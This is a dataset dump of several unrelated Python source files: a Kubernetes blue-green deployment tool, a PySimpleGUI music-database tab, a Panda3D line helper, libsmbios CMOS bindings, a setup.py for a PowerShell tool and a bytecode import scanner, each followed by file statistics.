# y_overlap = max(0, min(rect1.bottom, rect2.bottom) - max(rect1.top, rect2.top))
x_overlap = max(0, min(x_max_zone, p_x_max) - max(x_zone, p_x))
y_overlap = max(0, min(y_max_zone, p_y_max) - max(y_zone, p_y))
overlapArea = x_overlap * y_overlap
overlaps.append(overlapArea)
overlapSum = sum(overlaps)
# area weights are saved into proportions
proportions = [item / overlapSum for item in overlaps]
# 2.4. Count number of clicks present into each zones intersected (and weights)
# 2.5. Compute final threshold of `x` and `y` using `3` and `4` steps
p_thresholds = np.array(zones_threshold)[p_zones_indices]
# 3. Save this new entry into .csv file (scene_name; x; y; threshold)
if __name__== "__main__":
main() | 36.117318 | 133 | 0.589482 | 825 | 6,465 | 4.370909 | 0.232727 | 0.006101 | 0.023572 | 0.004437 | 0.079035 | 0.044648 | 0.029395 | 0 | 0 | 0 | 0 | 0.006926 | 0.307657 | 6,465 | 179 | 134 | 36.117318 | 0.798704 | 0.202784 | 0 | 0 | 0 | 0 | 0.059793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.130435 | 0 | 0.141304 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654b59f37671da6026e05478c0fb9645705e5478 | 9,597 | py | Python | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | 8 | 2017-11-24T12:07:02.000Z | 2020-04-27T03:27:58.000Z | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | 19 | 2017-11-14T23:35:31.000Z | 2022-03-08T22:50:02.000Z | bgkube/bg.py | stphivos/bg-kube | 3936c2899f76b2f58df7a5f38fac741c638562cf | [
"MIT"
] | null | null | null | from six import add_metaclass
from time import sleep
from bgkube import cmd, registries
from bgkube.api import KubeApi
from bgkube.run import Runner
from bgkube.errors import ActionFailedError
from bgkube.utils import output, log, timestamp, require, get_loadbalancer_address, is_host_up
class BgKubeMeta(type):
required = [
'cluster_zone', 'cluster_name', 'image_name', 'service_name', 'service_config', 'deployment_config'
]
optional = [
'context', 'dockerfile', 'env_file', 'smoke_tests_command', 'smoke_service_config', 'docker_machine_name',
'db_migrations_job_config_seed', 'db_migrations_status_command', 'db_migrations_apply_command',
'db_migrations_rollback_command', 'kops_state_store', 'container_registry', 'service_timeout',
'smoke_service_timeout', 'deployment_timeout', 'db_migrations_job_timeout', 'docker_build_args'
]
optional_defaults = {
'context': '.',
'dockerfile': './Dockerfile',
'container_registry': registries.DEFAULT,
'service_timeout': 120,
'smoke_service_timeout': 120,
'deployment_timeout': 120,
'db_migrations_job_timeout': 120,
'docker_build_args': ''
}
def __new__(mcs, name, bases, attrs):
attrs['required'] = mcs.required
attrs['optional'] = mcs.optional
for field in mcs.required + mcs.optional:
attrs[field] = mcs.optional_defaults.get(field, None)
return super(BgKubeMeta, mcs).__new__(mcs, name, bases, attrs)
@add_metaclass(BgKubeMeta)
class BgKube(object):
def __init__(self, options):
self.load_options(options)
self.kube_api = KubeApi()
self.runner = Runner(self.get_docker_daemon())
self.registry = registries.load(self.runner, options)
@property
def is_minikube(self):
return self.container_registry == 'local'
def get_docker_daemon(self):
return cmd.MINIKUBE_DOCKER_ENV if self.is_minikube else cmd.DOCKERMACHINE_ENV.format(self.docker_machine_name)
def load_options(self, options):
for opt in self.required:
setattr(self, opt, require(options, opt))
for opt in self.optional:
setattr(self, opt, getattr(options, opt, None) or getattr(self, opt))
@log('Building image {image_name} using {dockerfile}...')
def build(self):
tag = timestamp()
command = [cmd.DOCKER_BUILD.format(
context=self.context,
dockerfile=self.dockerfile,
image=self.image_name,
tag=tag,
)]
if self.docker_build_args:
command.append(' '.join('--build-arg {}'.format(b) for b in self.docker_build_args.split(' ')))
self.runner.start(' '.join(command))
return tag
@log('Pushing image {image_name}:{tag} to {registry}...')
def push(self, tag):
self.registry.push('{}:{}'.format(self.image_name, tag))
@log('Applying {_} using config: {filename}...')
def apply(self, _, filename, tag=None, color=''):
return self.kube_api.apply(filename, self.env_file, TAG=tag, COLOR=color, ENV_FILE=self.env_file)
def pod_find(self, tag):
results = [pod for pod in self.kube_api.pods(tag=tag) if pod.ready]
return results[0] if results else None
def pod_exec(self, tag, command, *args):
pod = self.pod_find(tag).name
return self.runner.start(cmd.KUBECTL_EXEC.format(pod=pod, command=command, args=' '.join(args)), capture=True)
def migrate_initial(self, tag):
if self.db_migrations_job_config_seed:
def job_completions_extractor(job):
completions = job.obj['spec']['completions']
succeeded_completions = job.obj['status']['succeeded']
return completions if succeeded_completions == completions else None
applied_objects = self.apply('db migration', self.db_migrations_job_config_seed, tag=tag)
self.wait_for_resource_running(
'Job',
'completions',
job_completions_extractor,
self.db_migrations_job_timeout,
*applied_objects
)
def migrate_apply(self, tag):
previous_state = None
if self.db_migrations_status_command:
previous_state = self.pod_exec(tag, self.db_migrations_status_command)
if self.db_migrations_apply_command:
self.pod_exec(tag, self.db_migrations_apply_command)
return previous_state
def migrate_rollback(self, tag, previous_state):
if self.db_migrations_rollback_command:
self.pod_exec(tag, self.db_migrations_rollback_command, previous_state)
def migrate(self, tag):
db_migrations_previous_state = None
is_initial = self.active_env() is None
if is_initial:
self.migrate_initial(tag)
else:
db_migrations_previous_state = self.migrate_apply(tag)
return is_initial, db_migrations_previous_state
def active_env(self):
service = self.kube_api.resource_by_name('Service', self.service_name)
return None if not service else service.obj['spec']['selector'].get('color', None)
def other_env(self):
return {
'blue': 'green',
'green': 'blue'
}.get(self.active_env(), None)
def deploy(self, tag):
color = self.other_env() or 'blue'
applied_objects = self.apply('deployment', self.deployment_config, tag=tag, color=color)
self.wait_for_resource_running(
'Deployment',
'replicas',
lambda deployment: deployment.replicas if deployment.ready and self.pod_find(tag) else None,
self.deployment_timeout,
*applied_objects
)
return color
@log('Waiting for {resource_type} {prop} to become available')
def wait_for_resource_running(self, resource_type, prop, prop_extractor, timeout_seconds, *object_names):
def try_extract_value(resource_name):
try:
result = self.kube_api.resource_by_name(resource_type, resource_name)
return prop_extractor(result or {})
except (IndexError, KeyError, AttributeError):
return None
def extract_value_with_timeout(resource_name):
value = None
if timeout_seconds:
attempts = 0
while not value and attempts < timeout_seconds:
sleep(1)
attempts += 1
output('.', '', flush=True)
value = try_extract_value(resource_name)
else:
value = try_extract_value(resource_name)
if value:
output('\n{} {} {} is: {}'.format(resource_type, resource_name, prop, value))
elif timeout_seconds:
raise ActionFailedError(
'\nFailed after {} seconds elapsed. For more info try running: $ kubectl describe {} {}'.format(
timeout_seconds, resource_type, resource_name))
return value
values = [extract_value_with_timeout(name) for name in object_names]
return values
@log('Running smoke tests on {color} deployment...')
def smoke_test(self, color):
if self.smoke_service_config:
def service_host_extractor(service):
if self.is_minikube:
service_address = self.runner.start(cmd.MINIKUBE_SERVICE_URL.format(service.name), capture=True)
else:
service_address = get_loadbalancer_address(service)
return service_address if is_host_up(service_address) else None
applied_objects = self.apply('smoke service', self.smoke_service_config, color=color)
smoke_service_address = ','.join(self.wait_for_resource_running(
'Service',
'host',
service_host_extractor,
self.smoke_service_timeout,
*applied_objects
))
return_code = self.runner.start(self.smoke_tests_command, TEST_HOST=smoke_service_address, silent=True)
return return_code == 0
return True
@log('Promoting {color} deployment...')
def swap(self, color):
self.apply('public service', self.service_config, color=color)
self.wait_for_resource_running(
'Service',
'status',
lambda service: 'ready' if service.exists(ensure=True) else None,
self.service_timeout,
self.service_name
)
@log('Publishing...')
def publish(self):
next_tag = self.build()
self.push(next_tag)
next_color = self.deploy(next_tag)
is_initial, db_migrations_previous_state = self.migrate(next_tag)
health_ok = self.smoke_test(next_color)
if health_ok:
self.swap(next_color)
else:
if not is_initial:
self.migrate_rollback(next_tag, db_migrations_previous_state)
raise ActionFailedError('Cannot promote {} deployment because smoke tests failed'.format(next_color))
output('Done.')
@log('Rolling back to previous deployment...')
def rollback(self):
color = self.other_env()
if color:
self.swap(color)
else:
raise ActionFailedError('Cannot rollback to a previous environment because one does not exist.')
output('Done.')
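

# Illustrative usage sketch (not part of the original module): constructing
# BgKube from an options object and running one action. ``options`` must
# expose every attribute named in BgKube.required; how it is built (argparse,
# environment variables, ...) is left to the surrounding CLI and is assumed
# here.
def _example_publish(options):
    # build -> push -> deploy -> migrate -> smoke test -> swap
    BgKube(options).publish()


def _example_rollback(options):
    # re-point the public service at the previous deployment color
    BgKube(options).rollback()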
| 36.352273 | 118 | 0.62853 | 1,099 | 9,597 | 5.22657 | 0.182894 | 0.041783 | 0.02507 | 0.01915 | 0.158948 | 0.098364 | 0.030641 | 0.012883 | 0 | 0 | 0 | 0.002434 | 0.272168 | 9,597 | 263 | 119 | 36.490494 | 0.8199 | 0 | 0 | 0.082524 | 0 | 0 | 0.139106 | 0.021465 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126214 | false | 0 | 0.033981 | 0.019417 | 0.281553 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
654bc602b92a4d39e2692072c6e62be4b98b7a8c | 5,852 | py | Python | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | 1 | 2022-02-09T05:42:43.000Z | 2022-02-09T05:42:43.000Z | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | null | null | null | src/tabs/add.py | EthanG45/CSE412-HAML-Project | e6f754b2de35079453c1bf5e8814dc5fe4b6741c | [
"MIT"
] | 3 | 2020-11-28T23:06:03.000Z | 2022-03-14T02:23:50.000Z | import PySimpleGUI as sg
from faker import Faker
fake = Faker()
Faker.seed(2)
### #### #### #### #### #### #### #### #### ###
# ADD TABLE TABS #
### #### #### #### #### #### #### #### #### ###
class AddTab:
def __init__(self, db):
self.db = db
self.albumNameList = self.db.allAlbumName()
self.artistNameList = self.db.allArtistName()
self.recordLabelList = self.db.allCompanyName()
self.instrumentList = self.db.allInstName()
self.genreList = self.db.allGenre()
def updateLists(self):
self.albumNameList = self.db.allAlbumName()
self.artistNameList = self.db.allArtistName()
self.recordLabelList = self.db.allCompanyName()
self.instrumentList = self.db.allInstName()
self.genreList = self.db.allGenre()
def addTabGUI(self):
        ageList = list(range(155))
        locationList = [fake.city() for _ in range(1000)]
yearList = list(range(2021, 999, -1))
addTableRecord = sg.Tab(
'Record Label',
[[sg.Text("Add a Record Label", size=(1270, 1))],
[sg.Text("Company Name"), sg.Input(key='-companyName-C01-')],
[sg.Text("Label Location"), sg.Combo(locationList, key='-labelLocation-C01-')],
[sg.Text("What album did this record label publish?", size=(1270, 1))],
# Album elements
[sg.Text("Title"), sg.Listbox(values=self.albumNameList,
key='-TITLE-C01-', size=(50, 20))],
[sg.Text("Date Established"), sg.Input(key='-dateEstablished-C01-', size=(20, 1)),
sg.CalendarButton('Date Picker', close_when_date_chosen=True, format='%Y-%m-%d', target='-dateEstablished-C01-', no_titlebar=False, key='Calendar-C01')],
[sg.Button('ADD', key='-BUTTON-C01-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C01-')]],
key='C01'
) # end of tab Record Label
addTableArtist = sg.Tab(
'Artist',
[[sg.Text("Add an Artist", size=(1270, 1))],
# Artist elements
[sg.Text("Artist Name"), sg.Input(key='-ARTIST-C02-')],
[sg.Text("Age"), sg.Slider(range=(1, 155),
default_value=42,
size=(40, 15),
orientation='horizontal',
font=('Helvetica', 12), key='-AGE-C02-')],
# Musician elements
[sg.Text("Instrument"), sg.Listbox(values=self.instrumentList, key='-INSTRUMENT-C02-', size=(10, 5))],
[sg.Text("Band Name"), sg.Input(key='-BAND-C02-')],
# Album Elements
[sg.Text("What album did this artist make?", size=(1270, 1))],
[sg.Text("Add an Album")],
[sg.Text("Title"), sg.Input(key='-ALBUM-TITLE-C02-')],
[sg.Text("Add the Album's first song")],
[sg.Text("Title"), sg.Input(key='-SONG-TITLE-C02-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList, key='-GENRE-C02-', size=(10, 5))],
[sg.Text("Release Year"), sg.Combo(yearList, key='-RELEASE-YEAR-C02-')],
[sg.Text("Record Label"), sg.Listbox(values=self.recordLabelList, key='-RECORD-TITLE-C02-', size=(40, 8))],
[sg.Button('ADD', key='-BUTTON-C02-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C02-')]
],
key='C02'
)
addTableAlbum = sg.Tab(
'Album',
[[sg.Text("Add an Album")],
[sg.Text("Title"), sg.Input(key='-ALBUM-TITLE-C04-')],
[sg.Text("Add the Album's first song")],
[sg.Text("Title"), sg.Input(key='-SONG-TITLE-C04-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList,
key='-GENRE-C04-', size=(10, 5))],
[sg.Text("Release Year"), sg.Combo(
yearList, key='-RELEASE-YEAR-C04-')],
[sg.Text("Artist"), sg.Listbox(values=self.artistNameList,
key='-ARTIST-TITLE-C04-', size=(50, 20))],
[sg.Button('ADD', key='-BUTTON-C04-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C04-')]
],
key='C04'
)
addTableSong = sg.Tab(
'Song',
[[sg.Text("Add a song")],
[sg.Text("Title"), sg.Input(key='-TITLE-C05-')],
[sg.Text("Genre"), sg.Listbox(values=self.genreList,
key='-GENRE-C05-', size=(10, 10))],
[sg.Text("Album Title"), sg.Listbox(values=self.albumNameList,
key='-ALBUM-TITLE-C05-', size=(50, 20))],
[sg.Text("Release Year"), sg.Combo(
yearList, key='-releaseYear-C05-')],
[sg.Button('ADD', key='-BUTTON-C05-')],
[sg.Text(size=(100, 720), key='-OUTPUT-C05-')]
],
key='C05'
)
### #### #### #### #### #### #### #### #### ###
# END OF ADD TABLE TABS #
### #### #### #### #### #### #### #### #### ###
addTab = sg.Tab(
'Add',
[[sg.TabGroup(
[[
addTableSong,
addTableAlbum,
addTableArtist,
addTableRecord
]],
key='tabgroupAdd',
enable_events=True
) # end of TabGroup
]],
key='add_tab'
) # end of tab add
return addTab
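

# Illustrative usage sketch (not part of the original module): embedding the
# tab in a standalone window. The ``_FakeDB`` stub is hypothetical; a real
# ``db`` must provide the allAlbumName()/allArtistName()/allCompanyName()/
# allInstName()/allGenre() methods used in __init__.
if __name__ == '__main__':
    class _FakeDB:
        def allAlbumName(self): return []
        def allArtistName(self): return []
        def allCompanyName(self): return []
        def allInstName(self): return []
        def allGenre(self): return []

    layout = [[sg.TabGroup([[AddTab(_FakeDB()).addTabGUI()]])]]
    window = sg.Window('HAML Add Tab demo', layout)
    window.read()
    window.close()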
| 36.123457 | 167 | 0.458476 | 590 | 5,852 | 4.528814 | 0.233898 | 0.078593 | 0.033683 | 0.056886 | 0.462575 | 0.415419 | 0.391841 | 0.31512 | 0.302021 | 0.302021 | 0 | 0.046438 | 0.352358 | 5,852 | 161 | 168 | 36.347826 | 0.658575 | 0.038278 | 0 | 0.1875 | 0 | 0 | 0.173586 | 0.007715 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026786 | false | 0 | 0.017857 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8daa8cfa08fbe78f266741f068409aae4cb7fd2 | 358 | py | Python | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
] | null | null | null | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
] | null | null | null | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
] | null | null | null | from panda3d.core import NodePath, LineSegs
class Star():
def __init__(self):
self.np = NodePath('pen')
    def create(self, pos):
        # Draw a short white vertical segment ending at ``pos``.
        segs = LineSegs()
        segs.setThickness(1.0)
        segs.moveTo(pos[0], pos[1], pos[2] - 1)
        segs.setColor(1, 1, 1, 1)  # RGBA components are floats in [0, 1]
        segs.drawTo(pos[0], pos[1], pos[2])
        return segs.create()
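

# Illustrative usage sketch (not part of the original module): attach the
# GeomNode produced by Star.create() to a Panda3D scene graph so the segment
# becomes visible. Running this opens a Panda3D window.
if __name__ == '__main__':
    from direct.showbase.ShowBase import ShowBase

    base = ShowBase()
    star = Star()
    node = star.create((0.0, 10.0, 0.0))  # segment from z = -1 up to this point
    NodePath(node).reparentTo(base.render)
    base.run()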
| 19.888889 | 48 | 0.553073 | 46 | 358 | 4.217391 | 0.543478 | 0.051546 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068826 | 0.310056 | 358 | 17 | 49 | 21.058824 | 0.716599 | 0 | 0 | 0 | 0 | 0 | 0.008427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8dd7db38433b8f032d7c1c8f92bc765aa0c4fa9 | 3,598 | py | Python | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | null | null | null | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | null | null | null | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | 1 | 2021-06-08T15:59:26.000Z | 2021-06-08T15:59:26.000Z | # vim:tw=0:expandtab:autoindent:tabstop=4:shiftwidth=4:filetype=python:
#############################################################################
#
# Copyright (c) 2005 Dell Computer Corporation
# Dual Licenced under GNU GPL and OSL
#
#############################################################################
"""
cmos_obj:
python interface to functions in libsmbios_c obj/cmos.h
"""
# imports (alphabetical)
import ctypes
import exceptions
from libsmbios_c import libsmbios_c_DLL as DLL
from _common import errorOnNegativeFN, errorOnNullPtrFN
from trace_decorator import decorate, traceLog, getLog
__all__ = ["CmosAccess", "CMOS_DEFAULTS", "CMOS_GET_SINGLETON", "CMOS_GET_NEW", "CMOS_UNIT_TEST_MODE"]
CMOS_DEFAULTS =0x0000
CMOS_GET_SINGLETON =0x0001
CMOS_GET_NEW =0x0002
CMOS_UNIT_TEST_MODE=0x0004
decorate(traceLog())
def CmosAccess(flags=CMOS_GET_SINGLETON, factory_args=None):
if factory_args is None: factory_args = []
if _CmosAccess._instance is None:
_CmosAccess._instance = _CmosAccess( flags, *factory_args)
return _CmosAccess._instance
class _CmosAccess(ctypes.Structure):
_instance = None
decorate(traceLog())
def __init__(self, *args):
self._cmosobj = None
self._cmosobj = DLL.cmos_obj_factory(*args)
# dont decorate __del__
def __del__(self):
DLL.cmos_obj_free(self._cmosobj)
decorate(traceLog())
    def readByte(self, offset, indexPort, dataPort):
        # cmos_obj_read_byte (declared below) fills a one-byte buffer that
        # must be passed by reference.
        buf = ctypes.c_uint8()
        DLL.cmos_obj_read_byte(self._cmosobj, ctypes.byref(buf), indexPort, dataPort, offset)
        return buf.value

    decorate(traceLog())
    def writeByte(self, byte, offset, indexPort, dataPort):
        # Write a single byte via cmos_obj_write_byte (declared below).
        DLL.cmos_obj_write_byte(self._cmosobj, byte, indexPort, dataPort, offset)
#// format error string
#const char *cmos_obj_strerror(const struct cmos_access_obj *m);
# define strerror first so we can use it in error checking other functions.
DLL.cmos_obj_strerror.argtypes = [ ctypes.POINTER(_CmosAccess) ]
DLL.cmos_obj_strerror.restype = ctypes.c_char_p
decorate(traceLog())
def _strerror(obj):
return Exception(DLL.cmos_obj_strerror(obj))
#struct cmos_access_obj *cmos_obj_factory(int flags, ...);
# dont define argtypes because this is a varargs function...
#DLL.cmos_obj_factory.argtypes = [ctypes.c_int, ]
DLL.cmos_obj_factory.restype = ctypes.POINTER(_CmosAccess)
DLL.cmos_obj_factory.errcheck = errorOnNullPtrFN(lambda r,f,a: _strerror(r))
#void cmos_obj_free(struct cmos_access_obj *);
DLL.cmos_obj_free.argtypes = [ ctypes.POINTER(_CmosAccess) ]
DLL.cmos_obj_free.restype = None
#int cmos_obj_read_byte(const struct cmos_access_obj *, u8 *byte, u32 indexPort, u32 dataPort, u32 offset);
DLL.cmos_obj_read_byte.argtypes = [ ctypes.POINTER(_CmosAccess), ctypes.POINTER(ctypes.c_uint8), ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32 ]
DLL.cmos_obj_read_byte.restype = ctypes.c_int
DLL.cmos_obj_read_byte.errcheck = errorOnNegativeFN(_strerror)
#int cmos_obj_write_byte(const struct cmos_access_obj *, u8 byte, u32 indexPort, u32 dataPort, u32 offset);
DLL.cmos_obj_write_byte.argtypes = [ ctypes.POINTER(_CmosAccess), ctypes.c_uint8, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32 ]
DLL.cmos_obj_write_byte.restype = ctypes.c_int
DLL.cmos_obj_write_byte.errcheck = errorOnNegativeFN(_strerror)
#// useful for checksums, etc
#typedef int (*cmos_write_callback)(const struct cmos_access_obj *, bool, void *);
#void cmos_obj_register_write_callback(struct cmos_access_obj *, cmos_write_callback, void *, void (*destruct)(void *));
#int cmos_obj_run_callbacks(const struct cmos_access_obj *m, bool do_update);
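

# Illustrative usage sketch (not part of the original module). Accessing CMOS
# normally requires root privileges; ports 0x70/0x71 and offset 0x00 are the
# conventional RTC index/data ports and seconds register, shown only as an
# example.
if __name__ == '__main__':
    cmos = CmosAccess()
    print(cmos.readByte(0x00, 0x70, 0x71))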
| 37.479167 | 148 | 0.72985 | 485 | 3,598 | 5.076289 | 0.286598 | 0.073924 | 0.073111 | 0.061738 | 0.285134 | 0.242486 | 0.169781 | 0.136474 | 0.111292 | 0.111292 | 0 | 0.017943 | 0.132574 | 3,598 | 95 | 149 | 37.873684 | 0.770907 | 0.322679 | 0 | 0.106383 | 0 | 0 | 0.031943 | 0 | 0 | 0 | 0.010648 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.106383 | 0.021277 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8ddae265d9b0bb9c7857ab422d8753d658f3928 | 1,141 | py | Python | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | 13 | 2020-06-07T18:06:48.000Z | 2020-09-17T03:29:04.000Z | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | null | null | null | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | 3 | 2020-06-09T15:50:39.000Z | 2022-02-25T11:24:58.000Z | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from setuptools import setup, find_packages
import psgen
import os
datadir = os.path.join('payload')
datafiles = [(d, [os.path.join(d,f) for f in files])
for d, folders, files in os.walk(datadir)]
setup(name=psgen.__name__,
version=psgen.__version__,
author='Pongsakorn Sommalai',
author_email='bongtrop@gmail.com',
license='MIT',
url='https://github.com/bongtrop/psgen',
description=psgen.__doc__,
long_description=open("README.md").read(),
packages=['psgen'],
include_package_data = True,
install_requires=[
"pyyaml",
"tabulate",
"Jinja2",
"ps_minifier @ git+https://github.com/jusmistic/ps-minifier"
],
entry_points="""
[console_scripts]
psgen=psgen:main
""",
keywords=['powershell', 'tool', 'hack'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: MIT License',
'Topic :: Utilities',
'Programming Language :: Python :: 3']
)
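
# A minimal sketch (not part of the original file) of how the package is
# typically installed and invoked once the console_scripts entry point above
# is registered:
#
#     $ pip install .
#     $ psgen ...    # dispatches to psgen.main()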
| 27.166667 | 68 | 0.595968 | 124 | 1,141 | 5.314516 | 0.677419 | 0.018209 | 0.030349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004695 | 0.253287 | 1,141 | 41 | 69 | 27.829268 | 0.768779 | 0.034181 | 0 | 0 | 0 | 0 | 0.368182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e0ba99ac26f1b721d8b12e685abc61364a4ef9 | 5,778 | py | Python | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | 1 | 2021-03-01T20:25:29.000Z | 2021-03-01T20:25:29.000Z | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | null | null | null | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | null | null | null | """Code Introspection Utilities"""
import os
import struct
import itertools
import dis
import collections
__all__ = ['ImportScanner', 'ImportFinder']
class Opname(object):
LOAD_CONST = chr(dis.opname.index('LOAD_CONST'))
IMPORT_NAME = chr(dis.opname.index('IMPORT_NAME'))
STORE_NAME = chr(dis.opname.index('STORE_NAME'))
STORE_GLOBAL = chr(dis.opname.index('STORE_GLOBAL'))
STORE_OPS = [STORE_NAME, STORE_GLOBAL]
HAVE_ARGUMENT = chr(dis.HAVE_ARGUMENT)
# Adapted from stdlib 'modulefinder'
class ImportScanner(object):
"""Scanner for extracting `import` statement in the source code"""
def __init__(self, pathname):
super(ImportScanner, self).__init__()
self._code = self._get_code_oject(pathname)
self._source = self._get_source_code(pathname)
self._imports = None
@property
def imports(self):
if self._imports is None:
self._imports = []
self._scan_code(self._code)
return self._imports
def _get_source_code(self, pathname):
source = None
with open(pathname, 'r') as fp:
source = dict(enumerate(fp.readlines()))
return source
def _get_code_oject(self, pathname):
code = None
with open(pathname, 'r') as fp:
code = compile(fp.read() + '\n', pathname, 'exec')
return code
def _scanner(self, co):
code = co.co_code
names = co.co_names
consts = co.co_consts
LOAD_AND_IMPORT = (
Opname.LOAD_CONST
+ Opname.LOAD_CONST
+ Opname.IMPORT_NAME
)
i = 0
while code:
c = code[0]
if c in Opname.STORE_OPS:
oparg, = struct.unpack('<H', code[1:3])
yield "store", (i, names[oparg],)
code = code[3:]
i += 3
continue
if code[:9:3] == LOAD_AND_IMPORT:
oparg_1, oparg_2, oparg_3 = struct.unpack('<xHxHxH', code[:9])
level = consts[oparg_1]
if level == -1: # normal import
yield "import", (i, consts[oparg_2], names[oparg_3])
elif level == 0: # absolute import
yield "absolute_import", (
i, consts[oparg_2], names[oparg_3])
else: # relative import
yield "relative_import", (
i, level, consts[oparg_2], names[oparg_3])
code = code[9:]
i += 9
continue
if c >= Opname.HAVE_ARGUMENT:
code = code[3:]
i += 3
else:
code = code[1:]
i += 1
def _scan_code(self, co):
for what, args in self._scanner(co):
addr = args[0]
args = args[1:]
lineno = self._addr_to_lineno(co, addr)
line = None
if lineno:
line = self._source.get(lineno - 1)
if what == "store":
name, = args
elif what in ("import", "absolute_import"):
fromlist, name = args
if fromlist is not None:
fromlist = filter(lambda f: f != '*', fromlist)
if what == "absolute_import":
level = 0
else:
level = -1
self._import_hook(lineno, line, name, fromlist)
elif what == "relative_import":
level, fromlist, name = args
if name:
self._import_hook(lineno, line, name, fromlist)
else:
# We don't expect anything else from the generator.
raise RuntimeError(what)
for c in co.co_consts:
if isinstance(c, type(co)):
self._scan_code(c)
def _import_hook(self, lineno, line, name, fromlist):
self._imports.append((lineno, line, name, fromlist))
def _addr_to_lineno(self, co, addr):
return dict(self._addr_line_map(co)).get(addr)
def _addr_line_map(self, co):
def pairwise(iterable):
a = iter(iterable)
return itertools.izip(a, a)
last_line_num = None
line_num = co.co_firstlineno
byte_num = 0
for byte_incr, line_incr in pairwise(map(ord, co.co_lnotab)):
if byte_incr:
if line_num != last_line_num:
yield (byte_num, line_num)
last_line_num = line_num
byte_num += byte_incr
line_num += line_incr
if line_num != last_line_num:
yield (byte_num, line_num)
class ImportFinder(object):
""""Finds imports for a package"""
def __init__(self, package_root):
self._package_root = package_root
self._import_data = None
@property
def import_data(self):
if self._import_data is None:
self._import_data = self._get_imports()
return self._import_data
